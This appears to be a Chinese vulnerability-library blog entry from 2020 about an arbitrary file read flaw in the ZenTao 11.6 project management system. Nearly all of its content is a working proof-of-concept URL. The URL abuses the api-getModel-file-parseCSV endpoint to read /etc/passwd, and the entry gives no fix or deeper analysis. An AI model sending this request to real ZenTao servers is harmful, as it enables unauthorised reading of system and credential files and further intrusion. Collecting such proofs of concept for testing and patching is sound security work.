禅道11.6任意文件读取


title: ‘禅道11.6任意文件读取’
date: Thu, 17 Sep 2020 01:38:25 +0000
draft: false
tags: [‘白阁-漏洞库’]

### 影响范围

禅道 11.6

### 漏洞POC

“`
http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd
“`

![img](/static/baige/01-CMS漏洞/禅道/禅道11.6任意文件读取/2020090917060866.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容